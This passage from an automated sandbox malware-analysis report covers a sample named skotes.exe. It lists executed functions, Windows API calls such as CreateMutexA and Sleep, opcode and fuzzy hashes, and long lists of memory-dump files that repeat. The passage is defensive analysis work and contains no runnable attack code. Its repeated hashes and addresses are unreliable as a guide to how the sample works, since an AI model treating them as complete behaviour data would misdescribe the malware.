Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: e56c75f2e431ad977c45cec8f28de688efeb9e05e0e451714bfb150d58e8faa2
Instruction ID: 7ed13c6d83c66d3ffeb4aaccac2cf8cc2da7925bef528594584666ec05858b32
Opcode Fuzzy Hash: e56c75f2e431ad977c45cec8f28de688efeb9e05e0e451714bfb150d58e8faa2
Instruction Fuzzy Hash: 61211D71A00219AFDF01EBA4D8829BEB7B9EF58710F100015F605BB251DB30AD419BA0

Analysis Process: skotes.exePID: 6140, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1970
Total number of Limit Nodes:	9

Executed Functions

Function 0015652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0015652A,?,?,?,?,?,00157661), ref: 00156566

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b0cf5ed6c9407ccfee62716cd5a4ebecf2fcad9abf5e0c3902d3bcfb0f1a4cb5
Instruction ID: 2c83dee76a79c123ff9fb8d648bfc89c5a022ca457c2ffcc19a195aab7ba4322
Opcode Fuzzy Hash: b0cf5ed6c9407ccfee62716cd5a4ebecf2fcad9abf5e0c3902d3bcfb0f1a4cb5
Instruction Fuzzy Hash: B3E08C30092148EBCF66BB18CC06A483B69FF21786F800810FC258F229DF25ED86C690

Function 00129BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3eed6fc342d470d386c8a0ee8d0f0611f73f28752998000925ecddcc5d93da55
Instruction ID: a304e614b96a3812e15470930735a4512c50e5f5c1958d971353e7422492d563
Opcode Fuzzy Hash: 3eed6fc342d470d386c8a0ee8d0f0611f73f28752998000925ecddcc5d93da55
Instruction Fuzzy Hash: B3312871B002148BEF18DB6CFD99B6DB7A2EFC6314F644218E0149B2D6C7755AA08761

Function 00129F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 598002703a4ac0153be3935e5a0ef05054f2eb357842b3c280f3e87271d52148
Instruction ID: 849469975f6da4ed0bffeba1f702bcb4f3e955dc84306eba16a6e33647014b08
Opcode Fuzzy Hash: 598002703a4ac0153be3935e5a0ef05054f2eb357842b3c280f3e87271d52148
Instruction Fuzzy Hash: D9312631B002148BEF18DB7CF9997ADBBA2EFC6314F644618F024DB2D5D73699908762

Function 0012A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 6bdf9229641af461c4db05134c0918de025116f87e1f0a1b5055dcfe2cda0f5b
Instruction ID: 8dac989d64ab106c4c9799ca27afb35e4bdd47efff0cf7ac91450c73e1cbeb49
Opcode Fuzzy Hash: 6bdf9229641af461c4db05134c0918de025116f87e1f0a1b5055dcfe2cda0f5b
Instruction Fuzzy Hash: 58315931B002149BEF08DB78FD997ADB772DFC2328F644218E024973D5C736A9A08722

Function 0012A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
